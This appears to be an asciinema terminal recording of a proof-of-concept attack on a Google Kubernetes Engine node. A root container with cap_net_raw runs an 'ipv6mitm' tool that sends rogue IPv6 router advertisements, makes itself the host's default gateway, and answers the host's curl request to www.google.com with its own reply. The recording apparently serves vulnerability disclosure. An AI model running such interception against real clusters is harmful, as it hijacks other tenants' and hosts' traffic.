[105.03539, "o", "7.0.0.1/8 scope host lo\u001b[K\r\n       valid_lft forever preferred_lft forever\u001b[K\r\n3: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1460 qdisc noqueue state UP group default \u001b[K\r\n    link/ether ce:4b:f0:c6:c2:14 brd ff:ff:ff:ff:ff:ff link-netnsid 0\u001b[K\r\n    inet 10.36.2.6/24 scope global eth0\u001b[K\r\n       valid_lft forever preferred_lft forever\u001b[K\r\nroot@ubuntu-pod:/# \u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[0] 0:ipv6*\u001b[39m\u001b[110X\u001b[30m\u001b[110C\"root@ubuntu-pod: /\" 03:25 15-mars-20\u001b(B\u001b[m\u001b[52;20H\u001b[?12l\u001b[?25h"]
[110.597676, "o", "# IPv6 is disabled on this virtual ethernet interface, but we have cap_net_raw "]
[111.378325, "o", "\r\nroot@ubuntu-pod:/# \u001b[K"]
[111.380638, "o", "\u001b[28;1H────────────────────────────────────────────────────────────────────────────────\u001b[32m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1H1\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # no forwarding && accept_ra by default\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # let's try to request google.com\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m curl www.google.com -vs 2>&1 | head -n20\u001b[K\r\n*   Trying 172.217.214.106...\u001b[K\r\n* TCP_NODELAY set\u001b[K\r\n* Connected to www.google.com (172.217.214.106) port 80 (#0)\u001b[K\r\n> GET / HTTP/1.1\u001b[K\r\n> Host: www.googl"]
[111.380763, "o", "e.com\u001b[K\r\n> User-Agent: curl/7.64.1\u001b[K\r\n> Accept: */*\u001b[K\r\n> \u001b[K\r\n< HTTP/1.1 200 OK\u001b[K\r\n< Date: Sun, 15 Mar 2020 07:25:17 GMT\u001b[K\r\n< Expires: -1\u001b[K\r\n< Cache-Control: private, max-age=0\u001b[K\r\n< Content-Type: text/html; charset=ISO-8859-1\u001b[K\r\n< P3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\u001b[K\r\n< Server: gws\u001b[K\r\n< X-XSS-Protection: 0\u001b[K\r\n< X-Frame-Options: SAMEORIGIN\u001b[K\r\n< Set-Cookie: 1P_JAR=2020-03-15-07; expires=Tue, 14-Apr-2020 07:25:17 GMT; path=/; domain=.google.com; Secure\u001b[K\r\n< Set-Cookie: NID=200=GyOLRmYQme14kGhZp9rCwSSHX-miJ7wdBTIvuLVPDfNVVAyWJNz5JsTmljW4qMqaKZsenUq6wuIrAqBGuJCXq9OL4-gzzAL_eJLF0S2h8Xv-IDGk-fbhDjXVyhwBBSCGovp3TD35\u001b[24;1HpYErxmCTnK5GuDV9rscIFwreD9sOA6JsDFQ; expires=Mon, 14-Sep-2020 07:25:17 GMT; path=/; domain=.google.com; HttpOnly\u001b[K\r\n< Accept-Ranges: none\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # we used IPv4 and got a normal response\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[K\u001b[29;1H[echam"]
[111.38091, "o", "petier@echampetier ~]$ kubectl exec -it ubuntu-pod /bin/bash\u001b[K\r\nroot@ubuntu-pod:/# capsh --print\u001b[K\r\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mkn\u001b[32;1Hod,cap_audit_write,cap_setfcap+eip\u001b[K\r\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_\u001b[34;1Hmknod,cap_audit_write,cap_setfcap\u001b[K\r\nSecurebits: 00/0x0/1'b0\u001b[K\r\n secure-noroot: no (unlocked)\u001b[K\r\n secure-no-suid-fixup: no (unlocked)\u001b[K\r\n secure-keep-caps: no (unlocked)\u001b[K\r\nuid=0(root)\u001b[K\r\ngid=0(root)\u001b[K\r\ngroups=\u001b[K\r\nroot@ubuntu-pod:/# # by default root inside the container has the cap_net_raw capability, so we can send receive anything we want\u001b[K\r\nroot@ubuntu-pod:/# ip a\u001b[K\r\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\u001b[K\r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\u001b[K\r\n    inet 12"]
[111.381024, "o", "7.0.0.1/8 scope host lo\u001b[K\r\n       valid_lft forever preferred_lft forever\u001b[K\r\n3: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1460 qdisc noqueue state UP group default \u001b[K\r\n    link/ether ce:4b:f0:c6:c2:14 brd ff:ff:ff:ff:ff:ff link-netnsid 0\u001b[K\r\n    inet 10.36.2.6/24 scope global eth0\u001b[K\r\n       valid_lft forever preferred_lft forever\u001b[K\r\nroot@ubuntu-pod:/# # IPv6 is disabled on this virtual ethernet interface, but we have cap_net_raw \u001b[K\r\nroot@ubuntu-pod:/# \u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[0] 0:ipv6*\u001b[39m\u001b[110X\u001b[30m\u001b[110C\"root@ubuntu-pod: /\" 03:26 15-mars-20\u001b(B\u001b[m\u001b[53;20H\u001b[?12l\u001b[?25h"]
[116.241618, "o", "# let's start our POC"]
[117.058364, "o", "\r\nroot@ubuntu-pod:/# "]
[117.060245, "o", "\u001b[28;1H────────────────────────────────────────────────────────────────────────────────\u001b[32m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1H1\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # no forwarding && accept_ra by default\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # let's try to request google.com\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m curl www.google.com -vs 2>&1 | head -n20\u001b[K\r\n*   Trying 172.217.214.106...\u001b[K\r\n* TCP_NODELAY set\u001b[K\r\n* Connected to www.google.com (172.217.214.106) port 80 (#0)\u001b[K\r\n> GET / HTTP/1.1\u001b[K\r\n> Host: www.googl"]
[117.060542, "o", "e.com\u001b[K\r\n> User-Agent: curl/7.64.1\u001b[K\r\n> Accept: */*\u001b[K\r\n> \u001b[K\r\n< HTTP/1.1 200 OK\u001b[K\r\n< Date: Sun, 15 Mar 2020 07:25:17 GMT\u001b[K\r\n< Expires: -1\u001b[K\r\n< Cache-Control: private, max-age=0\u001b[K\r\n< Content-Type: text/html; charset=ISO-8859-1\u001b[K\r\n< P3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\u001b[K\r\n< Server: gws\u001b[K\r\n< X-XSS-Protection: 0\u001b[K\r\n< X-Frame-Options: SAMEORIGIN\u001b[K\r\n< Set-Cookie: 1P_JAR=2020-03-15-07; expires=Tue, 14-Apr-2020 07:25:17 GMT; path=/; domain=.google.com; Secure\u001b[K\r\n< Set-Cookie: NID=200=GyOLRmYQme14kGhZp9rCwSSHX-miJ7wdBTIvuLVPDfNVVAyWJNz5JsTmljW4qMqaKZsenUq6wuIrAqBGuJCXq9OL4-gzzAL_eJLF0S2h8Xv-IDGk-fbhDjXVyhwBBSCGovp3TD35\u001b[24;1HpYErxmCTnK5GuDV9rscIFwreD9sOA6JsDFQ; expires=Mon, 14-Sep-2020 07:25:17 GMT; path=/; domain=.google.com; HttpOnly\u001b[K\r\n< Accept-Ranges: none\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # we used IPv4 and got a normal response\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[K\u001b[29;1H[echam"]
[117.060747, "o", "petier@echampetier ~]$ kubectl exec -it ubuntu-pod /bin/bash\u001b[K\r\nroot@ubuntu-pod:/# capsh --print\u001b[K\r\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mkn\u001b[32;1Hod,cap_audit_write,cap_setfcap+eip\u001b[K\r\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_\u001b[34;1Hmknod,cap_audit_write,cap_setfcap\u001b[K\r\nSecurebits: 00/0x0/1'b0\u001b[K\r\n secure-noroot: no (unlocked)\u001b[K\r\n secure-no-suid-fixup: no (unlocked)\u001b[K\r\n secure-keep-caps: no (unlocked)\u001b[K\r\nuid=0(root)\u001b[K\r\ngid=0(root)\u001b[K\r\ngroups=\u001b[K\r\nroot@ubuntu-pod:/# # by default root inside the container has the cap_net_raw capability, so we can send receive anything we want\u001b[K\r\nroot@ubuntu-pod:/# ip a\u001b[K\r\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\u001b[K\r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\u001b[K\r\n    inet 12"]
[117.060951, "o", "7.0.0.1/8 scope host lo\u001b[K\r\n       valid_lft forever preferred_lft forever\u001b[K\r\n3: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1460 qdisc noqueue state UP group default \u001b[K\r\n    link/ether ce:4b:f0:c6:c2:14 brd ff:ff:ff:ff:ff:ff link-netnsid 0\u001b[K\r\n    inet 10.36.2.6/24 scope global eth0\u001b[K\r\n       valid_lft forever preferred_lft forever\u001b[K\r\nroot@ubuntu-pod:/# # IPv6 is disabled on this virtual ethernet interface, but we have cap_net_raw \u001b[K\r\nroot@ubuntu-pod:/# # let's start our POC\u001b[K\r\nroot@ubuntu-pod:/# \u001b[K\u001b[30m\u001b[42m\r\n[0] 0:ipv6*\u001b[39m\u001b[110X\u001b[30m\u001b[110C\"root@ubuntu-pod: /\" 03:26 15-mars-20\u001b(B\u001b[m\u001b[54;20H\u001b[?12l\u001b[?25h"]
[121.482284, "o", "./ipv6mitm -i eth0"]
[122.304966, "o", "\u001b[29;54r\u001b[5S\u001b[50d[1584257175.648s] (socket::set): [0]: adding\r\n[1584257175.648s] (socket::set): [1]: adding\r\n[1584257175.648s] (socket::tcp): #0:*:80: state=CLOSED=>LISTEN\r\n[1584257175.649s] (socket::icmp): #1:ff02::1: buffer to send 56 octets\u001b[1;55r\u001b[54;1H"]
[122.305747, "o", "\u001b[29;54r\u001b[54;1H\n\u001b[A[1584257175.649s] (socket::icmp): #1:ff02::1: sending 56 octets\u001b[1;55r\u001b[54;1H"]
[122.625712, "o", "\u001b[29;54r\u001b[6S\u001b[48d[1584257175.857s] (iface::ethernet): non-unicast source address\r\n[1584257175.858s] (iface::ethernet): cannot process ingress packet: malformed packet\r\n[1584257175.858s] (iface::ethernet): packet dump follows:\r\nEthernetII src=0e-78-6c-8b-33-2c dst=33-33-ff-8b-33-2c type=IPv6\r\n\\ IPv6 src=:: dst=ff02::1:ff8b:332c nxt_hdr=ICMPv6 hop_limit=255\r\n\u001b[32m[1584257175.858s] (ipv6mitm): poll error: malformed packet\u001b[1;55r\u001b[54;1H\u001b(B\u001b[m"]
[127.076138, "o", "\u001b[32m\u001b[26A────────────────────────────────────────────────────────────────────────────────\u001b[39m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[55;1H[0] 0:ipv6*\u001b[39m\u001b[107X\u001b[30m\u001b[107C\"echampetier.lab1.abcd\" 03:26 15-mars-20\u001b(B\u001b[m\u001b[27;57H\u001b[?12l\u001b[?25h"]
[130.853254, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[132.455803, "o", "\u001b[29;54r\u001b[2S\u001b[52d[1584257185.659s] (socket::icmp): #1:ff02::1: buffer to send 56 octets\r\n[1584257185.659s] (socket::icmp): #1:ff02::1: sending 56 octets\u001b[1;55r\u001b[27;57H"]
[134.819817, "o", "ip a show cbr0"]
[136.172747, "o", "\u001b[1;27r\u001b[7S\u001b[21d4: cbr0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1460 qdisc htb state UP group default qlen 1000\r\n    link/ether 0e:78:6c:8b:33:2c brd ff:ff:ff:ff:ff:ff\r\n    inet 10.36.2.1/24 scope global cbr0\r\n       valid_lft forever preferred_lft forever\r\n    inet6 2001:db8::c78:6cff:fe8b:332c/64 scope global mngtmpaddr dynamic \r\n       valid_lft 57sec preferred_lft 27sec\u001b[1;55r\u001b[27;1H"]
[136.174415, "o", "\u001b[1;27r\u001b[2S\u001b[25d    inet6 fe80::c78:6cff:fe8b:332c/64 scope link \r\n       valid_lft forever preferred_lft forever\r\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[142.210734, "o", "ip -6 r"]
[142.41135, "o", "\u001b[29;54r\u001b[2S\u001b[52d[1584257195.658s] (socket::icmp): #1:ff02::1: buffer to send 56 octets\r\n[1584257195.658s] (socket::icmp): #1:ff02::1: sending 56 octets\u001b[1;55r\u001b[27;64H"]
[143.29477, "o", "\u001b[1;27r\u001b[8S\u001b[20d::1 dev lo proto kernel metric 256  pref medium\r\nfe80::/64 dev eth0 proto kernel metric 256  pref medium\r\nfe80::/64 dev cbr0 proto kernel metric 256  pref medium\r\nfe80::/64 dev vethc5e27097 proto kernel metric 256  pref medium\r\nfe80::/64 dev veth28cda20f proto kernel metric 256  pref medium\r\nfe80::/64 dev veth0e043293 proto kernel metric 256  pref medium\r\ndefault via fe80::1 dev cbr0 proto ra metric 1024  expires 29sec hoplimit 64 pref medium\r\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[152.526973, "o", "\u001b[29;54r\u001b[2S\u001b[52d[1584257205.652s] (socket::icmp): #1:ff02::1: buffer to send 56 octets\r\n[1584257205.652s] (socket::icmp): #1:ff02::1: sending 56 octets\u001b[1;55r\u001b[27;57H"]
[153.004836, "o", "# We just configured the host to talk"]
[153.005936, "o", " IPv6, and the cont"]
[153.007428, "o", "ainer is the default ga"]
[153.009701, "o", "tew"]
[153.045939, "o", "ay"]
[153.881577, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[162.35893, "o", "\u001b[29;54r\u001b[2S\u001b[52d[1584257215.658s] (socket::icmp): #1:ff02::1: buffer to send 56 octets\r\n[1584257215.658s] (socket::icmp): #1:ff02::1: sending 56 octets\u001b[1;55r\u001b[27;57H"]
[164.296911, "o", "# let's try to request google"]
[164.299604, "o", ".com again"]
[164.91069, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[169.313461, "o", "curl www.google.com -vs 2>&1 | head -"]
[169.316617, "o", "n20"]
[170.355583, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[1;55r\u001b[27;1H"]
[170.362712, "o", "\u001b[1;27r\u001b[3S\u001b[24d*   Trying 2607:f8b0:4001:c07::68...\r\n* TCP_NODELAY set\r\n* Connected to www.google.com (2607:f8b0:4001:c07::68) port 80 (#0)\u001b[1;55r\u001b[27;1H"]
[170.365835, "o", "\u001b[1;27r\u001b[13S\u001b[14d> GET / HTTP/1.1\r\n> Host: www.google.com\r\n> User-Agent: curl/7.64.1\r\n> Accept: */*\r\n> \r\n* HTTP 1.0, assume close after body\r\n< HTTP/1.0 200 OK\r\n< Connection: close\r\n< Content-Length: 3\r\n< \r\n{ [3 bytes data]\r\n* Closing connection 0\r\nok\u001b[29;54r\u001b[26S\u001b[29d[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: state=SYN-RECEIVED=>ESTABLISHED\r\n\u001b[32m[1584257223.708s] (ipv6mitm): tcp:80 recv\r\n\u001b[39m[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: rx buffer: receiving 78 octets at offset 0\r\n[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: rx buffer: enqueueing 78 octets (now 78)\r\n[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: outgoing segment will acknowledge\r\n[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: sending ACK\r\n\u001b[32m[1584257223.708s] (ipv6mitm): tcp:80 rec"]
[170.36619, "o", "v\r\n\u001b[39mGET / HTTP/1.1\r\nHost: www.google.com\r\nUser-Agent: curl/7.64.1\r\nAccept: */*\u001b[41;1H\u001b[32m[1584257223.708s] (ipv6mitm): tcp:80 send\r\n[1584257223.708s] (ipv6mitm): tcp:80 close\r\n\u001b[39m[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: state=ESTABLISHED=>FIN-WAIT-1\r\n[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: outgoing segment will send data or flags\r\n[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: tx buffer: sending 60 octets at offset 0\r\n[1584257223.708s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: sending FIN|ACK\r\n\u001b[32m[1584257223.708s] (ipv6mitm): tcp:80 recv\r\n\u001b[39m[1584257223.709s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: received ACK of FIN\r\n[1584257223.709s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: state=FIN-WAIT-1=>TIME-WAIT\r\n[1584257223.709"]
[170.366472, "o", "s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: tx buffer: dequeueing 60 octets (now 0)\r\n[1584257223.709s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: outgoing segment will acknowledge\r\n[1584257223.709s] (socket::tcp): #0:2607:f8b0:4001:c07::68:80:2001:db8::c78:6cff:fe8b:332c:58422: sending ACK\r\n[1584257223.709s] (socket::tcp): #0:*:80: state=CLOSED=>LISTEN\u001b[1;55r\u001b[27;1H\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m "]
[172.392451, "o", "\u001b[29;54r\u001b[2S\u001b[52d[1584257225.651s] (socket::icmp): #1:ff02::1: buffer to send 56 octets\r\n[1584257225.651s] (socket::icmp): #1:ff02::1: sending 56 octets\u001b[1;55r\u001b[27;57H"]
[175.587747, "o", "\u001b[29;54r\u001b[54;1H\n\u001b[A[1584257228.857s] (iface::neighbor): filled fe80::c78:6cff:fe8b:332c => 0e-78-6c-8b-33-2c (was empty)\u001b[1;55r\u001b[27;57H"]
[176.971912, "o", "#"]
[176.972444, "o", " we used IPv6 this time, and the ans"]
[176.973205, "o", "wer came from the c"]
[176.974872, "o", "ontainer"]
[179.617746, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[180.033377, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[55;1H[0] 0:ipv6*\u001b[39m\u001b[107X\u001b[30m\u001b[107C\"echampetier.lab1.abcd\" 03:27 15-mars-20\u001b(B\u001b[m\u001b[27;57H\u001b[?12l\u001b[?25h"]
[182.427711, "o", "\u001b[29;54r\u001b[2S\u001b[52d[1584257235.655s] (socket::icmp): #1:ff02::1: buffer to send 56 octets\r\n[1584257235.655s] (socket::icmp): #1:ff02::1: sending 56 octets\u001b[1;55r\u001b[27;57H"]
[184.276243, "o", "\u001b[1;55r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b]112\u0007"]
[184.276413, "o", "\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1049l\u001b[23;0;0t"]
[184.276678, "o", "[detached (from session 0)]\r\n"]
